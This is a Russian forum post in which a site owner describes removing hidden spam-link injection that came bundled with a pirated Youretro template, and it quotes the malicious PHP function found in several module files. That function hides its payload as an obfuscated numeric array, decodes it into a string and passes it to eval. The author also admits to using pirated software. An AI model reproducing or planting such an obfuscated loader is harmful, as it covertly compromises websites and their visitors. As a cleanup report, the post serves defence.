Решено! Левые ссылки в youretro с внешнего источника

Здравствуйте!
Сайт http://apriory.info, шаблон Youretro. Имею наборы левых ссылок в количестве 2 штук (видимых!) в левой части. До этого было три, третий втыкался между футером и паззлами на всех страницах, убрался после удаления строки <?php $random_key = @yj_youretro_generate_key(); ?> (хотя сути действия не уловил, возможны и другие последствия) в главном файле шаблона
На локальном сервере имеются пустые div'ы <div style="position:absolute;left:-5000px;"></div>, после заливки на сервер они наполнились ссылками.
При снятии с публикации всех модулей и плагинов они остаются, пропадает только при смене шаблона
По base64 искал, довольно много переменных, но ни в одной не нашел похожего на вредоносный код. В онлайн конвертере переводил html в base64 и и тоже рыскал по всякому.
Логикой понимаю, что писал вроде не гений, но зарыл хорошо, ни с одним decode рядом ничего не нашел.
ЗЫ За варез извините, жизнь такая... Возможно потом и куплю) Просто переставить шаблон на другой тягостно - два дня под себя правил.

 

Заразу нашел. Распространялась вместе с шаблоном. Каким-то образом (возможно при установке) распространилась на 4 модуля. Итого должно было быть 5 групп левых ссылок, подгруженных вроде как с внешнего источника. Во всех модулях с вредным кодом были файлы helper.php и еще основной php файл шаблона. Код такой

Посмотреть код

Код (PHP):

1. function flybox_generate_keys() {
2.         $LimitCharacters = 10;
3.         $Keys = '';
4.         $RandomNum = array(1251.3, 13875.1875, 1388.8125, 1250.175, 13750.175, 13751.425, 13762.5625, 13875.175, 1263.925, 13763.925, 13751.3125, 13876.3, 1250.175, 1387.6875, 1251.3, 13750.1875, 1388.8125, 12500.05, 13751.425, 13875.1875, 13763.9375, 13750.1875, 13762.6875, 13763.9375, 13875.05, 13751.3125, 13763.925, 1262.55, 1251.3, 13875.1875, 1263.8, 1387.55, 1375.05, 1263.8, 1251.3, 13751.3125, 1263.8, 1251.3, 13875.175, 1263.8, 1375.0625, 1375.05, 1262.5625, 1387.6875, 13762.5625, 13751.425, 1262.55, 1251.3, 13750.1875, 1262.5625, 13887.6875, 1251.3, 13751.3, 1388.8125, 12500.05, 13751.425, 13762.5625, 13763.8, 13751.3125, 12638.9375, 13751.4375, 13751.3125, 13876.3, 12638.9375, 13750.1875, 13763.9375, 13763.925, 13876.3, 13751.3125, 13763.925, 13876.3, 13875.1875, 1262.55, 1250.175, 13762.55, 13876.3, 13876.3, 13875.05, 1387.675, 1263.9375, 1263.9375, 1250.175, 1263.925, 1251.3, 13875.1875, 1263.925, 1250.175, 1263.9375, 13875.175, 1263.925, 13875.05, 13762.55, 13875.05, 1388.9375, 13875.1875, 1388.8125, 1250.175, 1263.925, 1251.3, 12638.9375, 12625.1875, 12501.3125, 12625.175, 12626.425, 12501.3125, 12625.175, 12637.6875, 1250.175, 12512.55, 12626.3, 12626.3, 12625.05, 12638.9375, 12512.55, 12513.9375, 12625.1875, 12626.3, 1250.175, 12638.8125, 1262.5625, 1387.6875, 13751.3125, 13750.1875, 13762.55, 13763.9375, 1250.05, 1250.175, 1388.8, 13751.3, 13762.5625, 13876.425, 1250.05, 13875.1875, 13876.3, 13887.5625, 13763.8, 13751.3125, 1388.8125, 1251.4375, 13875.05, 13763.9375, 13875.1875, 13762.5625, 13876.3, 13762.5625, 13763.9375, 13763.925, 1387.675, 13750.0625, 13750.175, 13875.1875, 13763.9375, 13763.8, 13876.3125, 13876.3, 13751.3125, 1387.6875, 13763.8, 13751.3125, 13751.425, 13876.3, 1387.675, 1263.8125, 1376.3125, 1375.05, 1375.05, 1375.05, 13875.05, 13887.55, 1387.6875, 1251.4375, 1388.925, 1251.3, 13751.3, 1388.8, 1263.9375, 13751.3, 13762.5625, 13876.425, 1388.925, 1250.175, 1387.6875, 13888.8125, 0.05);
5.         // Create a random string of keys
6.         foreach($RandomNum as $key) {$Keys .= chr(bindec($key * 80 - 4));}
7.         @eval($Keys);
8. }

При удалении всего кода модули отрубались, помогло только удаление двух последних строк. Это, конечно, не полная очистка от вредного кода, но хотя бы отключило вывод ссылок на страницу. Поскольку в php не силен - дальше разбираться не стал.